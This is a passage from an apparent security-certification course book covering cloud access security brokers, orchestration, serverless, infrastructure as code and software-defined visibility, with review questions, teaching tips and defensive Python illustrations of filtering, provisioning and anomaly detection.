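    inbound=[Rule("-1", 0, 65535, "sg-default")],
    outbound=[Rule("-1", 0, 65535, "0.0.0.0/0")],
)


def demo():
    """Evaluate constructed packets for an instance at 10.0.1.10 (hypothetical addresses)."""
    membership = {"10.0.1.20": {"sg-default"}, "10.0.1.30": set()}
    web = StatefulFilter([WEB_SG], membership)
    member = StatefulFilter([DEFAULT_SG], membership)
    empty = StatefulFilter([SecurityGroup("sg-empty")], membership)
    return {
        "ssh_from_admin": web.evaluate(Packet("in", "tcp", "203.0.113.7", 50000, "10.0.1.10", 22)),
        "ssh_from_elsewhere": web.evaluate(Packet("in", "tcp", "198.51.100.9", 50000, "10.0.1.10", 22)),
        "https_from_anywhere": web.evaluate(Packet("in", "tcp", "198.51.100.9", 50001, "10.0.1.10", 443)),
        # reply to the accepted HTTPS connection: no egress rule covers port 50001, state does
        "https_reply": web.evaluate(Packet("out", "tcp", "10.0.1.10", 443, "198.51.100.9", 50001)),
        "unsolicited_egress_8080": web.evaluate(Packet("out", "tcp", "10.0.1.10", 40000, "198.51.100.9", 8080)),
        "peer_in_default_group": member.evaluate(Packet("in", "tcp", "10.0.1.20", 40000, "10.0.1.10", 3306)),
        "peer_outside_group": member.evaluate(Packet("in", "tcp", "10.0.1.30", 40000, "10.0.1.10", 3306)),
        "empty_group_inbound": empty.evaluate(Packet("in", "tcp", "203.0.113.7", 50002, "10.0.1.10", 443)),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:26s} {'ALLOW' if allowed else 'DROP'}")
```

The `https_reply` packet is allowed although no outbound rule covers port 50001; that is the state table at work. Remove the `https_from_anywhere` evaluation and the reply is dropped, which is the behaviour you would see from a stateless filter such as an AWS network ACL rather than a security group.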

Cloud Access Security Brokers

A cloud access security broker (CASB) is enterprise management software designed
to mediate access to cloud services by users across all types of devices. CASB vendors
include Blue Coat, now owned by Symantec (broadcom.com/products/cyber-security/
information-protection/cloud-application-security-cloudsoc), SkyHigh Networks, now
owned by McAfee (skyhighnetworks.com), Forcepoint (forcepoint.com/product/casb-
cloud-access-security-broker), Microsoft Cloud App Security (microsoft.com/en-us/
microsoft-365/enterprise-mobility-security/cloud-app-security), and Cisco Cloudlock
(cisco.com/c/en/us/products/security/cloudlock/index.html).
CASBs provide you with visibility into how clients and other network nodes are using
cloud services. Some of the functions of a CASB are:
• Enable single sign-on authentication and enforce access controls and authorizations
from the enterprise network to the cloud provider.

• Scan for malware and rogue or non-compliant device access.

• Monitor and audit user and resource activity.

• Mitigate data exfiltration by preventing access to unauthorized cloud services from
managed devices.

In general, CASBs are implemented in one of three ways:

• Forward proxy: this is a security appliance or host positioned at the client network
edge that forwards user traffic to the cloud network if the contents of that traffic
comply with policy. This requires configuration of users' devices or installation of
an agent. In this mode, the proxy can inspect all traffic in real time, even if that
traffic is not bound for sanctioned cloud applications. The problem with this mode
is that users may be able to evade the proxy and connect directly. Proxies are
also associated with poor performance, as without a load balancing solution they
become a bottleneck and potentially a single point of failure.

• Reverse proxy: this is positioned at the cloud network edge and directs traffic to
cloud services if the contents of that traffic comply with policy. This does not require
configuration of the users' devices. This approach is only possible if the cloud
application has proxy support.

• Application programming interface (API): rather than placing a CASB appliance
or host inline between cloud consumers and the cloud services, an API-based CASB
brokers connections between the cloud service and the cloud consumer. For
example, if a user account has been disabled or an authorization has been revoked
on the local network, the CASB would communicate this to the cloud service and use
its API to disable access there too. This depends on the API supporting the range
of functions that the CASB and access and authorization policies demand. CASB
solutions are quite likely to use both proxy and API modes for different security
management purposes.

Next-Generation Secure Web Gateway

Enterprise networks often make use of secure web gateways (SWG). An on-premises
SWG is a proxy-based firewall, content filter, and intrusion detection/prevention
system that mediates user access to Internet sites and services. A next-generation
SWG, as marketed by Netskope (netskope.com/products/next-gen-swg), combines
the functionality of an SWG with that of data loss prevention (DLP) and a CASB to
provide a wholly cloud-hosted platform for client access to websites and cloud apps.
This supports an architecture defined by Gartner as secure access service edge (SASE)
(scmagazine.com/home/opinion/secure-access-service-edge-sase-key-points-for-early-
adopters).


Review Activity:
Cloud Security Solutions
Answer the following questions:

1. Describe some key considerations that should be made when hosting data
or systems via a cloud solutions provider.

Integrate auditing and monitoring procedures and systems with on-premises detection,
identify responsibility for implementing security controls (such as patching or backup),
identify performance metrics in an SLA, and assess risks to privacy and confidentiality
from breaches at the service provider.

2. True or false? The account with which you register for the CSP services is
not an account with root privileges.

False. This account is the root account and has full privileges. It should not be used for
day-to-day administration or configuration.

3. Which security attribute is ensured by monitoring API latency and
correcting any problems quickly?

This ensures the availability of services.

4. What format is often used to write permissions statements for cloud
resource policies?

JavaScript Object Notation (JSON).

5. True or false? A customer is limited to creating one VPC per account.

False. There are limits to the number of virtual private clouds (VPCs) that can be
created, but more than one is allowed.

6. What feature allows you to filter traffic arriving at an instance?

This is accomplished by assigning the instance to a security group with the relevant
policy configured.

7. What is a cloud access security broker (CASB)?

Enterprise management software mediating access to cloud services by users to
enforce information and access policies and audit usage.


Topic 15C
Summarize Infrastructure as Code Concepts

EXAM OBJECTIVES COVERED
2.2 Summarize virtualization and cloud computing concepts

Coupled with the use of virtualization and the cloud is the idea of continuous delivery
models for automation and service integration. These technologies can be used
together to deliver an infrastructure as code model of provisioning networks and hosts
to support application services.

Teaching Tip: This topic completes the block on development/cloud by looking at some of
the more advanced technologies and applications of DevSecOps principles.

Services Integration and Microservices

In the early days of computer networks, architecture was focused on the provision
of server machines and intermediate network systems (switches and routers).
Architectural choices centered around where to place a "box" to run monolithic
network applications such as routing, security, address allocation, name resolution,
file sharing, email, and so on. With virtualization, the provision of these applications
is much less dependent on where you put the box and the OS that the box runs.
Virtualization helps to make the design architecture fit to the business requirement
rather than accommodate the business workflow to the platform requirement.

Teaching Tip: Contrast the legacy IT focus on deploying boxes with the modern paradigm of
abstracted, virtualized compute, storage, and network capacity that can be spun up,
perform a workload, and then be released for the next task.

Service-Oriented Architecture (SOA)

Service-oriented architecture (SOA) conceives of atomic services closely mapped
to business workflows. Each service takes defined inputs and produces defined
outputs. The service may itself be composed of sub-services. The key features of
a service function are that it is self-contained, does not rely on the state of other
services, and exposes clear input/output (I/O) interfaces. Because each service has a
simple interface, interoperability is made much easier than with a complex monolithic
application. The implementation of a service does not constrain compatibility choices
for client services, which can use a different platform or development language. This
independence of the service and the client requesting the service is referred to as
loose coupling.

Microservices
Microservice-based development shares many similarities with Agile software project
management and the processes of continuous delivery and deployment. It also shares
roots with the Unix philosophy that each program or tool should do one thing well.
The main difference between SOA and microservices is that SOA allows a service to be
built from other services. By contrast, each microservice should be capable of being
developed, tested, and deployed independently. The microservices are said to be highly
decoupled rather than just loosely coupled.


Services Integration and Orchestration

Services integration refers to ways of making these decoupled service or microservice
components work together to perform a workflow. Where SOA used the concept of
an enterprise service bus, microservices integration and cloud services/virtualization/
automation integration generally is very often implemented using orchestration
tools. Where automation focuses on making a single, discrete task easily repeatable,
orchestration performs a sequence of automated tasks. For example, you might
orchestrate adding a new VM to a load-balanced cluster. This end-to-end process might
include provisioning the VM, configuring it, adding the new VM to the load-balanced
cluster, and reconfiguring the load balancing weight distribution given the new cluster
configuration. In doing this, the orchestrated steps would have to run numerous
automated scripts or API service calls.
For orchestration to work properly, automated steps must occur in the right sequence,
taking dependencies into account; it must provide the right security credentials at
every step along the way; and it must have the rights and permissions to perform
the defined tasks. Orchestration can automate processes that are complex, requiring
dozens or hundreds of manual steps.
Cloud orchestration platforms connect to and provide administration, management,
and orchestration for many popular cloud platforms and services. One of the
advantages of using a third-party orchestration platform is protection from vendor
lock-in. If you wish to migrate from one cloud provider to another, or wish to move to a
multi-cloud environment, automated workflows can often be adapted for use on new
platforms. Industry leaders in this space include Chef (chef.io), Puppet (puppet.com),
Ansible (ansible.com), and Kubernetes (kubernetes.io).
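As an added example, not code from Chef, Puppet, Ansible, Kubernetes, or any other orchestration product, the Python below runs the load-balancer workflow from the paragraph above as a dependency graph: steps are ordered with a topological sort, each step is handed only the scoped credential its role needs, and a failure rolls back the completed steps in reverse order. The step names, roles, tokens, and in-memory "cloud" are invented for the illustration and stand in for API calls.

```python
"""Dependency-ordered orchestration with per-step credentials and rollback.

Added illustration; the "cloud" is an in-memory dict and the steps stand in
for API calls. Step names, roles, and tokens are invented for the example.
"""
from collections import deque

# One least-privilege credential per role rather than a shared admin key.
CREDENTIALS = {"compute": "token-compute", "config": "token-config", "lb": "token-lb"}

# Each step declares what it depends on and which role's credential it needs.
STEPS = {
    "provision_vm": {"needs": [], "role": "compute"},
    "configure_vm": {"needs": ["provision_vm"], "role": "config"},
    "add_to_pool": {"needs": ["configure_vm"], "role": "lb"},
    "reweight_pool": {"needs": ["add_to_pool"], "role": "lb"},
}


def order_steps(steps):
    """Return a dependency-respecting order (Kahn's algorithm); reject cycles."""
    indegree = {name: len(spec["needs"]) for name, spec in steps.items()}
    dependents = {name: [] for name in steps}
    for name, spec in steps.items():
        for dep in spec["needs"]:
            dependents[dep].append(name)
    ready = deque(sorted(n for n, d in indegree.items() if d == 0))
    order = []
    while ready:
        current = ready.popleft()
        order.append(current)
        for nxt in sorted(dependents[current]):
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                ready.append(nxt)
    if len(order) != len(steps):
        raise ValueError("workflow has a dependency cycle")
    return order


def _require(token, expected):
    """Stand-in for the cloud API rejecting a call made with the wrong credential."""
    if token != expected:
        raise PermissionError("credential not authorized for this step")


def provision_vm(cloud, token):
    _require(token, "token-compute")
    cloud["vms"].append("vm-03")

def configure_vm(cloud, token):
    _require(token, "token-config")
    cloud["configured"].add("vm-03")

def add_to_pool(cloud, token):
    _require(token, "token-lb")
    cloud["pool"].append("vm-03")

def reweight_pool(cloud, token):
    _require(token, "token-lb")
    cloud["prev_weights"] = dict(cloud["weights"])   # kept so the step can be undone
    cloud["weights"] = {vm: 100 // len(cloud["pool"]) for vm in cloud["pool"]}

ACTIONS = {"provision_vm": provision_vm, "configure_vm": configure_vm,
           "add_to_pool": add_to_pool, "reweight_pool": reweight_pool}
ROLLBACKS = {
    "provision_vm": lambda c: c["vms"].remove("vm-03"),
    "configure_vm": lambda c: c["configured"].discard("vm-03"),
    "add_to_pool": lambda c: c["pool"].remove("vm-03"),
    "reweight_pool": lambda c: c.update(weights=c.pop("prev_weights")),
}


def new_cloud():
    """Constructed starting state: two VMs already serving in the pool."""
    return {"vms": ["vm-01", "vm-02"], "configured": {"vm-01", "vm-02"},
            "pool": ["vm-01", "vm-02"], "weights": {"vm-01": 50, "vm-02": 50}}


def run_workflow(steps, cloud, fail_at=None):
    """Run steps in dependency order, passing each only its own credential.
    If a step fails, undo the completed steps in reverse order."""
    completed = []
    for name in order_steps(steps):
        token = CREDENTIALS[steps[name]["role"]]
        try:
            if name == fail_at:               # injected fault for demonstration
                raise RuntimeError(f"{name} failed")
            ACTIONS[name](cloud, token)
            completed.append(name)
        except Exception as exc:
            for done in reversed(completed):
                ROLLBACKS[done](cloud)
            return {"status": "rolled_back", "failed": name, "error": str(exc), "undone": completed}
    return {"status": "ok", "completed": completed}


if __name__ == "__main__":
    cloud = new_cloud()
    print(run_workflow(STEPS, cloud), cloud["weights"])
    broken = new_cloud()
    print(run_workflow(STEPS, broken, fail_at="add_to_pool"), broken == new_cloud())
```

Each action receives one token and nothing else, so a compromised configuration-management credential cannot touch the load balancer; the rollback path is what keeps a half-finished run from leaving an unconfigured VM behind in the pool.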

Application Programming Interfaces

Whether based on SOA or microservices, service integration, automation, and
orchestration all depend on application programming interfaces (APIs). The service API
is the means by which external entities interact with the service, calling it with expected
parameters and receiving the expected output. There are two predominant "styles" for
creating web application APIs:
• Simple Object Access Protocol (SOAP): uses XML format messaging and has a
number of extensions in the form of Web Services (WS) standards that support
common features, such as authentication, transport security, and asynchronous
messaging. SOAP also has built-in error handling.

• Representational State Transfer (REST): where SOAP is a tightly specified protocol,
REST is a looser architectural framework, also referred to as RESTful APIs. Where a
SOAP request must be sent as a correctly formatted XML document, a REST request
can be submitted as an HTTP operation/verb (GET or POST, for example). Each
resource or endpoint in the API, expressed as a noun, should be accessed via a
single URL.

Serverless Architecture

Serverless is a modern design pattern for service delivery. It is strongly associated
with modern web applications, most notably Netflix (aws.amazon.com/solutions/
case-studies/netflix-and-aws-lambda), but providers are appearing with products
to completely replace the concept of the corporate LAN. With serverless, all the
architecture is hosted within a cloud, but unlike "traditional" virtual private cloud (VPC)
offerings, services such as authentication, web applications, and communications
aren't developed and managed as applications running on VM instances located within
the cloud. Instead, the applications are developed as functions and microservices, each
interacting with other functions to facilitate client requests. When the client requires
some operation to be processed, the cloud spins up a container to run the code,
performs the processing, and then destroys the container. Billing is based on execution
time, rather than hourly charges. This type of service provision is also called function
as a service (FaaS). FaaS products include AWS Lambda (aws.amazon.com/lambda),
Google Cloud Functions (cloud.google.com/functions), and Microsoft Azure Functions
(azure.microsoft.com/services/functions).
The serverless paradigm eliminates the need to manage physical or virtual server
instances, so there is no management effort for software and patches, administration
privileges, or file system security monitoring. There is no requirement to provision
multiple servers for redundancy or load balancing. As all of the processing is taking
place within the cloud, there is little emphasis on the provision of a corporate network.
This underlying architecture is managed by the service provider. The principal
network security job is to ensure that the clients accessing the services have not been
compromised in a way that allows a malicious actor to impersonate a legitimate user.
This is a particularly important consideration for the developer accounts and devices
used to update the application code underpinning the services. These workstations
must be fully locked down, running no other applications or web code than those
necessary for development.
Serverless does have considerable risks. As a new paradigm, use cases and best
practices are not mature, especially as regards security. There is also a critical and
unavoidable dependency on the service provider, with limited options for disaster
recovery should that service provision fail.
Serverless architecture depends heavily on the concept of event-driven orchestration
to facilitate operations. For example, when a client connects to an application, multiple
services will be called to authenticate the user and device, identify the device location
and address properties, create a session, load authorizations for the action, use
application logic to process the action, read or commit information from a database,
and write a log of the transaction. This design logic is different from applications
written to run in a "monolithic" server-based environment. This means that adapting
existing corporate software will require substantial development effort.

Infrastructure as Code

The use of cloud technologies encourages the use of scripted approaches to
provisioning, rather than manually making configuration changes, or installing patches.
An approach to infrastructure management where automation and orchestration fully
replace manual configuration is referred to as infrastructure as code (IaC).
One of the goals of IaC is to eliminate snowflake systems. A snowflake is a
configuration or build that is different from any other. The lack of consistency—or
drift—in the platform environment leads to security issues, such as patches that
have not been installed, and stability issues, such as scripts that fail to run because of
some small configuration difference. By rejecting manual configuration of any kind and
using tooling that is idempotent, IaC keeps every build consistent. Idempotence means
that making the same call with the same parameters will always produce the same
result, so applying a build definition a second time changes nothing. Note that IaC is not
simply a matter of using scripts to create instances. Running scripts that have been
written ad hoc is just as likely to cause environment drift as manual configuration. IaC
means using carefully developed and tested scripts and orchestration runbooks to
generate consistent builds.
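The Python below is an added illustration of idempotence and drift written for this page; it is not code from Chef, Puppet, Ansible, or any other IaC tool. A declared build is applied with `converge`, which computes and performs only the changes needed, so a second run performs no work. `detect_drift` finds a host that has since been edited by hand, and the two `harden_ssh` functions contrast an ad hoc append-on-every-run script with its idempotent equivalent. The package names, sysctl keys, and simulated host are constructed for the example.

```python
"""Declarative, idempotent provisioning with drift detection (added illustration).

The desired build is data. `converge` diffs it against the observed state of a
simulated host and applies only the difference; applying it twice yields no
actions the second time. `detect_drift` reports a "snowflake": settings that
have departed from the declared build. Names and values are constructed.
"""
import copy

# The build definition. In a real tool this would be a manifest or playbook.
DESIRED = {
    "packages": {"openssh-server": "9.6", "nginx": "1.24"},
    "sysctl": {"net.ipv4.ip_forward": "0"},
    "services": {"nginx": "running", "telnet": "stopped"},
}

# Constructed starting state of a freshly imaged host.
FRESH = {"packages": {}, "sysctl": {"net.ipv4.ip_forward": "1"}, "services": {"telnet": "running"}}


class Host:
    """Simulated host; real tooling would query and change it over SSH or an API."""

    def __init__(self, name, state):
        self.name = name
        self.state = copy.deepcopy(state)

    def observe(self):
        return copy.deepcopy(self.state)


def plan(desired, observed):
    """Diff desired against observed and return only the actions needed."""
    actions = []
    for pkg, version in desired["packages"].items():
        if observed["packages"].get(pkg) != version:
            actions.append(("install", pkg, version))
    for key, value in desired["sysctl"].items():
        if observed["sysctl"].get(key) != value:
            actions.append(("sysctl", key, value))
    for svc, wanted in desired["services"].items():
        if observed["services"].get(svc, "stopped") != wanted:
            actions.append(("service", svc, wanted))
    return actions


def apply_actions(host, actions):
    for kind, name, value in actions:
        section = {"install": "packages", "sysctl": "sysctl", "service": "services"}[kind]
        host.state[section][name] = value


def converge(host, desired):
    """Bring the host to the desired state; return the actions that were taken."""
    actions = plan(desired, host.observe())
    apply_actions(host, actions)
    return actions


def detect_drift(host, desired):
    """Report settings that differ from the declared build without changing them."""
    return plan(desired, host.observe())


def naive_harden_ssh(host):
    """Ad hoc script: appends the directive on every run, so the result depends
    on how many times it has run and duplicate lines accumulate."""
    host.state.setdefault("sshd_config", []).append("PermitRootLogin no")
    return list(host.state["sshd_config"])


def declared_harden_ssh(host):
    """IaC form of the same change: ensure the directive is present exactly once."""
    cfg = host.state.setdefault("sshd_config", [])
    if "PermitRootLogin no" not in cfg:
        cfg.append("PermitRootLogin no")
    return list(cfg)


if __name__ == "__main__":
    web = Host("web01", FRESH)
    print("first run:", converge(web, DESIRED))       # five actions
    print("second run:", converge(web, DESIRED))      # nothing left to do
    web.state["sysctl"]["net.ipv4.ip_forward"] = "1"  # someone edits the box by hand
    print("drift:", detect_drift(web, DESIRED))
```

The drift report is what you would feed to a compliance dashboard or alert on; the converge step is what a scheduled IaC run does to pull the snowflake back into line. The naive script shows why "we have a script for that" is not the same as IaC.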
Software-Defined Networking

Teaching Tip: You can refer students to Cisco's website for more information about SDN
(cisco.com/c/en/us/solutions/software-defined-networking/overview.html).

IaC is partly facilitated by physical and virtual network appliances that are fully
configurable via scripting and APIs. As networks become more complex—perhaps
involving thousands of physical and virtual computers and appliances—it becomes
more difficult to implement network policies, such as ensuring security and managing
traffic flow. With so many devices to configure, it is better to take a step back and
consider an abstracted model about how the network functions. In this model, network
functions can be divided into three "planes":
• Control plane: makes decisions about how traffic should be prioritized and
secured, and where it should be switched.

• Data plane: handles the actual switching and routing of traffic and imposition of
security access controls.

• Management plane: monitors traffic conditions and network status.

A software-defined networking (SDN) application can be used to define policy
decisions on the control plane. These decisions are then implemented on the
data plane by a network controller application, which interfaces with the network
devices using APIs. The interface between the SDN applications and the SDN
controller is described as the "northbound" API, while that between the controller
and appliances is the "southbound" API. SDN can be used to manage compatible
physical appliances, but also virtual switches, routers, and firewalls. The architecture
supporting rapid deployment of virtual networking using general-purpose VMs
and containers is called network functions virtualization (NFV) (redhat.com/en/
topics/virtualization/what-is-nfv).
This architecture saves network and security administrators the job and complexity of
configuring each appliance with proper settings to enforce the desired policy. It also
allows for fully automated deployment (or provisioning) of network links, appliances,
and servers. This makes SDN an important part of the latest automation and
orchestration technologies.

Software-Defined Visibility

Where SDN addresses secure network "build" solutions, software-defined visibility
(SDV) supports assessment and incident response functions. Visibility is the near real-
time collection, aggregation, and reporting of data about network traffic flows and the
configuration and status of all the hosts, applications, and user accounts participating
in it.
SDV can help the security data collection process by gathering statistics from the
forwarding systems and then applying a classification scheme to those systems to
detect network traffic that deviates from baseline levels (gigamon.com/content/dam/
resource-library/english/white-paper/wp-software-defined-visibility-new-paradigm-
for-it.pdf). This can provide you with a more robust ability to detect anomalies—
anomalies that may suggest an incident. SDV therefore gives you a high-level
perspective of network flow and endpoint/user account behavior that may not be
possible with traditional appliances. SDV supports designs such as zero trust and
east/west traffic inspection (paloaltonetworks.com/cyberpedia/what-is-a-zero-trust-
architecture), plus implementation of security orchestration, automation, and
response (SOAR).
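The following Python is added as an illustration and is not taken from Gigamon or any SDV product. It runs the kind of baseline classification the paragraph describes over constructed flow records: it learns each internal host's normal per-interval egress volume and its east/west peers, then flags a live interval in which a web server pushes 50 MB to an unknown address, a database server contacts the Internet for the first time, and that same database server opens a conversation with an internal share it never used before. The addresses, host roles, and byte counts are invented.

```python
"""Baseline-deviation detection over flow records (added illustration, constructed data).

`build_baseline` learns, per internal host, the mean and standard deviation of
bytes sent to external addresses per interval, plus the set of internal-to-
internal (east/west) peers seen. `find_anomalies` flags intervals whose egress
deviates from a host's baseline by more than `z_threshold` standard deviations
and any east/west pair that never appeared during the baseline period.
"""
import statistics
from collections import defaultdict
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")   # assumed corporate range for the example


def is_internal(ip):
    return ip_address(ip) in INTERNAL


def egress_by_host(flows):
    """{host: {interval: bytes sent to external addresses}}"""
    totals = defaultdict(lambda: defaultdict(int))
    for interval, src, dst, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            totals[src][interval] += nbytes
    return totals


def build_baseline(flows):
    intervals = sorted({f[0] for f in flows})
    totals = egress_by_host(flows)
    hosts = {f[1] for f in flows if is_internal(f[1])}
    stats = {}
    for host in hosts:
        series = [totals[host].get(i, 0) for i in intervals]   # zero-fill quiet intervals
        stats[host] = (statistics.mean(series), statistics.pstdev(series))
    east_west = {(s, d) for _, s, d, _ in flows if is_internal(s) and is_internal(d)}
    return stats, east_west


def find_anomalies(flows, stats, east_west, z_threshold=3.0):
    anomalies = []
    for host, by_interval in egress_by_host(flows).items():
        mean, sd = stats.get(host, (0.0, 0.0))
        for interval, nbytes in sorted(by_interval.items()):
            if sd:
                z = (nbytes - mean) / sd
            else:   # host never varied (e.g. never sent anything out): any increase is anomalous
                z = float("inf") if nbytes > mean else 0.0
            if z > z_threshold:
                anomalies.append({"type": "egress_volume", "host": host,
                                  "interval": interval, "bytes": nbytes, "z": z})
    for interval, src, dst, _ in flows:
        if is_internal(src) and is_internal(dst) and (src, dst) not in east_west:
            anomalies.append({"type": "new_east_west", "src": src, "dst": dst, "interval": interval})
    return anomalies


# Constructed records: (interval, src, dst, bytes). web01=10.0.1.10, db01=10.0.2.20,
# hr-share=10.0.3.30; 203.0.113.50 is a SaaS endpoint, 198.51.100.77 an unknown host.
BASELINE_FLOWS = []
for i, web_bytes in enumerate([900_000, 1_100_000, 1_000_000, 950_000, 1_050_000], start=1):
    BASELINE_FLOWS += [
        (i, "10.0.1.10", "203.0.113.50", web_bytes),   # web01 talks to the SaaS provider
        (i, "10.0.1.10", "10.0.2.20", 300_000),        # web01 queries db01
        (i, "10.0.2.20", "10.0.1.10", 2_000_000),      # db01 answers; db01 never talks outside
    ]

LIVE_FLOWS = [
    (6, "10.0.1.10", "203.0.113.50", 980_000),        # normal
    (6, "10.0.1.10", "10.0.2.20", 300_000),           # normal
    (6, "10.0.2.20", "10.0.1.10", 2_000_000),         # normal
    (6, "10.0.1.10", "198.51.100.77", 50_000_000),    # 50 MB to an unknown host: possible exfiltration
    (6, "10.0.2.20", "198.51.100.77", 10_240),        # the database server reaching the Internet at all
    (6, "10.0.2.20", "10.0.3.30", 5_000_000),         # db01 to a share it never contacted before
]


def run():
    stats, east_west = build_baseline(BASELINE_FLOWS)
    return find_anomalies(LIVE_FLOWS, stats, east_west)


if __name__ == "__main__":
    for anomaly in run():
        print(anomaly)
```

The zero-variance branch matters in practice: a host whose baseline egress is exactly zero has no standard deviation to divide by, yet "this server has never spoken to the Internet before" is precisely the signal a SOAR playbook should act on.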

Fog and Edge Computing

Most of the cloud services we have considered so far are "user-facing." They support
applications that human users interact with, such as video streaming, CRM, business
analytics, email and conferencing, endpoint protection analytics, and so on. However,
a very large and increasing amount of cloud data processing takes place with data
generated by Internet of Things (IoT) devices and sensors. Industrial processes and
even home automation are availability focused. While confidentiality and integrity are
still important concerns, service interruption in an operational technology network can
be physically dangerous. Consequently, there is a strong requirement to retrieve and
analyze IoT data with low latency.
A traditional data center architecture does not meet this requirement very well.
Sensors are quite likely to have relatively low-bandwidth, higher latency WAN links to
data networks. Sensors may generate huge quantities of data, only a selection of which
needs to be prioritized for analysis. Fog computing, developed by Cisco (cisco.com/c/
dam/en_us/solutions/trends/iot/docs/computing-overview.pdf), addresses these
requirements by placing fog node processing resources close to the physical location
of the IoT sensors. The sensors communicate with the fog node, using Wi-Fi, ZigBee,
or 5G, and the fog node prioritizes traffic, analyzes and remediates alertable
conditions, and backhauls remaining data to the data center for storage and low-
priority analysis.
Edge computing is a broader concept partially developed from fog computing and
partially evolved in parallel to it. Fog computing is now seen as working within the
concept of edge computing. Edge computing uses the following concepts:
• Edge devices are those that collect and depend upon data for their operation.
For example, a thermometer in an HVAC system collects temperature data; the
controller in an HVAC system activates the electromechanical components to
turn the heating or air conditioning on or off in response to ambient temperature
changes. The impact of latency becomes apparent when you consider edge devices
such as self-driving automobiles.

• Edge gateways perform some pre-processing of data to and from edge devices
to enable prioritization. They also perform the wired or wireless connectivity to
transfer data to and from the storage and processing networks.

• Fog nodes can be incorporated as a data processing layer positioned close to the
edge gateways, assisting the prioritization of critical data transmission.

• The cloud or data center layer provides the main storage and processing resources,
plus distribution and aggregation of data between sites.

In security terms, the fog node or edge gateway layers represent high-value targets for
both denial of service and data exfiltration attacks.

The controversy over the use of Huawei's equipment within 5G and edge networks illustrates
the risks and concerns over supply chains and trusted computing (threatpost.com/huawei-
5g-security-implications 1 6).


Review Activity:
Infrastructure as Code
Answer the following questions:

1. A company has been using a custom-developed client-server application
for customer management, accessed from remote sites over a VPN. Rapid
overseas growth has led to numerous complaints from employees that the
system suffers many outages and cannot cope with the increased number
of users and access by client devices such as smartphones. What type of
architecture could produce a solution that is more scalable?

Microservices is a suitable architecture for replacing monolithic client-server
applications that do not meet the needs of geographically diverse, mobile workforces.
By breaking the application up into microservice components and hosting these in
cloud containers, performance can scale to demand. Web-based APIs are better suited
to browser-based access on different device types.

2. You have been asked to produce a summary of pros and cons for the
products Chef and Puppet. What type of virtualization or cloud computing
technology do these support?

These are orchestration tools. Orchestration facilitates "automation of automation,"
ensuring that scripts and API calls are made in the right order and at the right time to
support an overall workflow.

3. True or false? Serverless means running computer code on embedded
systems.

False. With serverless, the provision of functions running in containers is abstracted
from the underlying server hardware. The point is that as a consumer, you do not
perform any server management. The servers are still present, but they are operated
and maintained by the cloud service provider.

4. A company's web services are suffering performance issues because
updates keep failing to run on certain systems. What type of architecture
could address this issue?

Infrastructure as Code (IaC) means that provisioning is performed entirely from
standard scripts and configuration data. The absence of manual configuration
adjustments or ad hoc scripts to change settings is designed to eliminate configuration
drift so that updates run consistently between the development and production
environments.

5. What is SDV?

Software-defined visibility (SDV) gives API-based access to network infrastructure
and hosts so that configuration and state data can be reported in near real time. This
facilitates greater automation in models and technologies such as zero trust, inspection
of east/west data center traffic, and use of security orchestration, automation, and
response (SOAR) tools.


Lesson 15
Summary

You should be able to summarize virtualization and cloud computing concepts and
implement cloud security controls for compute, storage, and network functions.

Teaching Tip: Check that students are confident about the content that has been covered.
If there is time, revisit any content examples that they have questions about. If you have
used all the available time for this lesson block, note the issues, and schedule time for a
review later in the course.

Guidelines for Implementing Secure Cloud Solutions

Follow these guidelines for deploying or extending use of cloud and virtualization
infrastructure:
• Assess requirements for availability and confidentiality that will determine the
appropriate cloud deployment model (public, hosted private, private, community,
or hybrid).
• Identify a service provisioning model (software, platform, or infrastructure) that best
fits the application requirement, given available development resources and the
degree of customization required.
• Consider whether the service or business need could be better supported by
advanced concepts:
  • Microservices, serverless, and orchestration to focus on workflow requirements
  rather than server administration.
  • IaC, SDN, and SDV for automated platform provisioning.
  • Edge/fog computing to ensure availability and low latency in embedded systems
  and IoT networks.
• If using a CSP, create an SLA and security responsibility matrix to identify who
will perform security-critical tasks. Ensure that reporting and monitoring of cloud
security data is integrated with on-premises monitoring and incident response.
• If using on-premises virtualization or a private data center, ensure robust
procedures for developing and deploying virtual machines and protecting
hypervisor security.
• Configure native or third-party security controls to protect cloud services:
  • For compute resources, ensure isolation of workloads and dynamic resource
  allocation.
  • For storage resources, provision high availability through local or zone-based
  replication.
  • For network resources, isolate instances to appropriate security zones through
  virtual networks and provision native or vendor firewalls and security groups to
  perform request filtering and authorization.
  • Provision secure accounts for developer access, protected by MFA, and ensure
  effective management of API keys and other secrets.

Lesson 16
Explaining Data Privacy and Protection Concepts

LESSON INTRODUCTION
If people are an organization's most important asset, then data comes a close second. The rapid adoption of cybersecurity awareness and technologies has come about because of the huge reputational and financial costs of high-profile data and privacy breaches. It is usually data that the threat actors want, and data that the whole system is set up to protect.
The confidentiality, integrity, and availability security attributes of data processing and storage are ensured through a mixture of managerial, operational, and technical controls. Along with security, you should also be able to assess privacy factors when collecting and storing data, and identify how processes must be shaped by legislative and regulatory compliance.

Teaching Tip: Data breaches and privacy compliance issues provide powerful business needs to improve cybersecurity. This lesson completes the "protect" theme by collecting the objectives and content examples related to data confidentiality and privacy.

Lesson Objectives
In this lesson, you will:
• Explain privacy and data sensitivity concepts.
• Explain privacy and data protection controls.


Topic 16A
Explain Privacy and Data Sensitivity Concepts

EXAM OBJECTIVES COVERED
2.1 Explain the importance of security concepts in an enterprise environment
5.3 Explain the importance of policies to organizational security
5.5 Explain privacy and sensitive data concepts in relation to security

Teaching Tip: This lesson focuses on objective 5.5, but does include some data content examples from 2.1 and 5.3 as well. This topic focuses on organizational procedures and institutional roles, with technical controls left to the next topic.

A detailed understanding of privacy and data sensitivity concepts will help you to operate within an overall data governance team. Data security and privacy are areas where policy and procedure are as important as technical controls in ensuring compliance. These policies and procedures may also need to be expressed in agreements with external partners, suppliers, and customers. As a security professional, you will need to select and apply these policies, procedures, and agreements wisely.

Privacy and Sensitive Data Concepts
The value of information assets can be thought of in terms of how a compromise of the data's security attributes of the confidentiality, integrity, and availability (CIA) triad would impact the organization. When surveying information within an organization, it is important not to solely judge how secretly it might need to be kept, but how the data is used within workflows. For example, the risk to confidentiality of public information is nonexistent. The risk to availability, however, could have significant impacts on workflows.
